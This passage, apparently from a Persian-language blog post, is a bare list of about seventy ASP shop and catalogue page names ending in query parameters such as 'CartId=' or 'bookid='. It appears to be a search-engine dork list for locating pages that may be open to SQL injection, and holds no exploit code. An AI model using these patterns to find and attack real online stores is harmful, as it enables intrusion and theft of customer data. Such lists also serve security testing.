  "results.asp?cat="
  "savecart.asp?CartId="
  "search.asp?CartID="
  "searchcat.asp?search_id="
  "Select_Item.asp?id="
  "Services.asp?ID="
  "shippinginfo.asp?CartId="
  "shop.asp?a="
  "shop.asp?action="
  "shop.asp?bookid="
  "shop.asp?cartID="
  "shop_details.asp?prodid="
  "shopaddtocart.asp"
  "shopaddtocart.asp?catalogid="
  "shopbasket.asp?bookid="
  "shopbycategory.asp?catid="
  "shopcart.asp?title="
  "shopcreatorder.asp"
  "shopcurrency.asp?cid="
  "shopdc.asp?bookid="
  "shopdisplaycategories.asp"
  "shopdisplayproduct.asp?catalogid="
  "shopdisplayproducts.asp"
  "shopexd.asp"
  "shopexd.asp?catalogid="
  "shopping_basket.asp?cartID="
  "shopprojectlogin.asp"
  "shopquery.asp?catalogid="
  "shopremoveitem.asp?cartid="
  "shopreviewadd.asp?id="
  "shopreviewlist.asp?id="
  "ShopSearch.asp?CategoryID="
  "shoptellafriend.asp?id="
  "shopthanks.asp"
  "shopwelcome.asp?title="
  "show_item.asp?id="
  "show_item_details.asp?item_id="
  "showbook.asp?bookid="
  "showStore.asp?catID="
  "shprodde.asp?SKU="
  "specials.asp?id="
  "store.asp?id="
  "store_bycat.asp?id="
  "store_listing.asp?id="
  "Store_ViewProducts.asp?Cat="
  "store-details.asp?id="
  "storefront.asp?id="
  "storefronts.asp?title="
  "storeitem.asp?item="
  "StoreRedirect.asp?ID="
  "subcategories.asp?id="
  "tek9.asp?"
  "template.asp?Action=Item&pid="
  "topic.asp?ID="
  "tuangou.asp?bookid="
  "type.asp?iType="
  "updatebasket.asp?bookid="
  "updates.asp?ID="
  "view.asp?cid="
  "view_cart.asp?title="
  "view_detail.asp?ID="
  "viewcart.asp?CartId="
  "viewCart.asp?userID="
  "viewCat_h.asp?idCategory="
  "viewevent.asp?EventID="
  "viewitem.asp?recor="
  "viewPrd.asp?idcategory="
  "ViewProduct.asp?misc="
  "voteList.asp?item_ID="
  "whatsnew.asp?idCategory="
  "WsAncillary.asp?ID"

  نظرات  (۰)

  هیچ نظری هنوز ثبت نشده است

  ارسال نظر

  ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
  شما میتوانید از این تگهای html استفاده کنید:
  <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
  تجدید کد امنیتی